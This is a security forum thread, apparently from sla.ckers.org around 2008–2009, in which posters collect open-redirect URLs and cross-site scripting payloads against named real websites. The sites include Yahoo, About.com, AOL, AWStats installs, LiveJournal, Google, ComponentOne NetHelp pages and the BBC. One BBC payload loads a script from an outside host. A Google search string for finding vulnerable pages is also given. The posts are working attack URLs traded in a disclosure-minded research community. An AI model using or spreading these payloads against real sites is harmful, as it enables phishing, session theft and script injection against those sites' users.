Another yahoo redirect, I don't think that this has been disclosed yet: http://av.rds.yahoo.com/**http%3a//www.google.com/

There was a similar one posted before, but that now gives a warning page: http://rds.yahoo.com/**http%3a//www.google.com/

-tx @ lowtech-labs.org

http://clk.about.com/?zi=1/1&zu=http://sla.ckers.org

also xss, if you prefer: http://clk.about.com/?zi=1/1&zu=javascript:alert%28document.domain%29

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/21/2008 02:22PM by tx.

i don't understand. av.rds.yahoo.com is a fourth level domain. if they had properly implemented redirection attacks filtering wouldn't be it covered by rds.yahoo.com, being the *exact same* ?

omg, please. no. they have *hardcoded* this fscking workaround ?

well, looks like they're ready to form MicroHoo! they already have the same bug management system...

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

http://www.backboris.com/includes/settext.php?redir=http://www.holditupforridicule.com/borisrace.JPG

Newly elected Mayor of London! Lord save us!



Edited 1 time(s). Last edit at 05/03/2008 09:12AM by cyrus.

http://www.lexico.com/go/http://sla.ckers.org/forum/


creators of dictionary.com, thesaurus.com, reference.com

https://login.manageyourloans.com/CALM/login.do?command=showLoginPage&destAppName=SallieMae&returnUrl=https://www.google.com

Nice job, AWStats - let's include a redirector, just in case somebody will need it:

http://pierceive.com/cgi-bin/awstats/awredir.pl?url=http://google.com/

A quote from that script:

if (! $ENV{'GATEWAY_INTERFACE'}) {      # Run from command line
        print "----- $PROG $VERSION (c) Laurent Destailleur -----\n";
        print "This script is absolutely not required to use AWStats.\n";
        print "It's a third tool that can help webmaster in their tracking tasks but is\n";
        print "not used by AWStats engine.\n";
        print "\n";
        print "This tools must be used as a CGI script. When called as a CGI, it returns to\n";
        print "browser a redirector to tell it to show the page provided in 'url' parameter.\n";
        print "So, to use this script, you must replace HTML code for external links onto your\n";
        print "HTML pages from\n";
        print "<a href=\"http://externalsite/pagelinked\">Link</a>\n";
        print "to\n";
        print "<a href=\"http://mysite/cgi-bin/awredir.pl?url=http://externalsite/pagelinked\">Link</a>\n";
        print "\n";
        print "For your web visitor, there is no difference. However this allow you to track\n";
        print "clicks done on links onto your web pages that point to external web sites,\n";
        print "because an entry will be seen in your own server log, to awredir.pl script\n";
        print "with url parameter, even if link was pointing to another external web server.\n";
        print "\n";
        sleep 2;
        exit 0;
}

But does anybody care to read this?

@trev: XSS too http://pierceive.com/cgi-bin/awstats/awredir.pl?url=javascript:eval(document.location.hash.substr(1))#alert%28document.domain%29 , gotta love it! :\

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 06/22/2008 03:03PM by tx.

Haha, the awstats thing is mental.

http://search.aol.tw/aol/redir?src=PTL&clickedItemURN=http://wocares.com

what's interesting about this is that aol.tw and aol.com have different security standards, because contrary to aol.tw, aol.com warns you

http://search.aol.com/aol/redir?src=PTL&clickedItemURN=http://wocares.com

what's EVEN MORE funny is that the better security of aol.com contains XSS:

hxxp://search.aol.com/aol/redirWarn?redirAuth=nauth&clickedItemURN=http://wocares.com/sieben"><script>alert('XSS')</script>



Edited 1 time(s). Last edit at 08/04/2008 09:00PM by Kyo.

Another aol redirection:

http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100214839x1203415855x1200131198&_url=http://www.xssed.com/

Courtesy of McAfee.com: [server.iad.liveperson.net]

http://barrasapo.mredir.sapo.pt/sla.ckers.org

http://messagebot.com/cgi-bin/click.cgi?http://sla.ckers.org/forum/

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Meant to post here: http://sla.ckers.org/forum/read.php?3,44,25604#msg-25604

So in the meantime, enjoy this obvious link: http://anonym.to//http%3A//google.com

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 12/12/2008 11:04PM by tx.

It may be obvious, but it redirects upon successful login. http://www.livejournal.com/?returnto=http%3A%2f%2fsla.ckers.org

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/26/2009 04:57PM by tx.

rsnake Wrote:
-------------------------------------------------------
> Anyone want to make their own articles?
> http://www.bbc.co.uk/cgi-bin/navigation/mailto.pl?
> from=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%
> 3E&subject=&body=&x=66&y=15&REFERER=http%3A%2F%2Fw
> ww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml

Page still not fixed, you can still make your own articles:

http://www.bbc.co.uk/cgi-perl/navigation/mailto.pl?from=&subject=&body=%3C/textarea%3E%3Cscript%20src=%22http://jurriaanpruis.nl/bbc_js.js%22%3E%3C/script%3E&x=66&y=15&REFERER=http%3A%2F%2Fwww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml

If you find an open redirect on Amazon you have an open redirect on google:

http://www.google.com/tbproxy/redir?hl=en&lt=isbn&q=../../../open-redirect

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Documentation/pages generated by ComponentOne's Doc To Help product have a (framed) open redirect vulnerability. ComponentOne was notified almost a year ago. Anyways, this product has been used by lots of companies to create some public help pages...

Try a Google search - allinurl:/nethelp/default.htm

For example:
http://www.softpro.hr/NetHelp/NetHelp/default.htm?turl=http://sla.ckers.org

javascript and data work too.

-Mazlo